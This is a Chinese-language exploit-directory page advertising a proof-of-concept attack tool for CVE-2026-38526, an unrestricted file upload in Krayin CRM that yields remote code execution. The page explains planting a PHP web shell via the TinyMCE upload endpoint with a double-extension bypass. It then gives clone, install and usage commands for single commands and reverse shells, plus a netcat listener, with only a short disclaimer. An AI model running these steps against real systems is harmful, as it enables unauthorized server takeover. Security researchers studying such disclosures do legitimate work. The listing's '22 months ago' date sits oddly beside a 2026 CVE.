Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-38526-POC — Krayin CRM <= v2.2.x 中 CVE-2026-38526 的概念验证。任意文件上传导致远程代码执行。 | Kitploit
工具/GitHubGitHub/pawpic/cve-2026-38526-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发
GitHubpawpic/cve-2026-38526-poc

CVE-2026-38526-POC

Krayin CRM <= v2.2.x 中 CVE-2026-38526 的概念验证。任意文件上传导致远程代码执行。

查看仓库
22个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-38526 - Krayin CRM RCE 漏洞利用

Krayin CRM(≤ 2.2.x)- 不受限制的文件上传,导致远程代码执行。

此 PoC 利用存在漏洞的 TinyMCE 上传端点(/admin/tinymce/upload)上传 PHP WebShell,并在服务器上实现命令执行。


功能

  • 通过 CSRF 令牌处理实现全自动登录
  • 利用双扩展名绕过上传限制
  • 支持反弹 Shell 和单条命令执行
  • 可靠的 Laravel CSRF 令牌刷新
  • 简洁易用

下载

root@kitploit:~
git clone https://github.com/pawpic/CVE-2026-38526-POC

环境要求

root@kitploit:~
pip3 install requests beautifulsoup4

用法

  1. 反弹 Shell(默认且推荐)
root@kitploit:~
python3 exploit.py \
  -u http://example.com \
  -e [email protected] \
  -p "example_pass" \
  --lhost YOUR_IP \
  --lport 4444
  1. 单条命令
root@kitploit:~
python3 exploit.py \
  -u http://example.com \
  -e [email protected] \
  -p "example_pass" \
  -c "whoami"

选项

示例流程

启动监听:

root@kitploit:~
nc -lvnp 4444

运行利用程序:

root@kitploit:~
python3 exploit.py -u http://target.com -e [email protected] -p password --lhost IP_ADDR

免责声明

此漏洞利用仅用于教育目的和经授权的渗透测试。对未获得明确测试许可的系统进行未授权使用属于违法行为。

受影响版本

Krayin CRM ≤ 2.2.x CVE: CVE-2026-38526

作者:pawpic 日期:2026

下载工具
参数描述必需
-u, --url目标基础 URL是
-e, --email登录邮箱是
-p, --password登录密码是
-c, --cmd执行单条命令否
--lhost用于反弹 Shell 的 IP是(如果不使用 --cmd)
--lport监听端口否(默认:4444)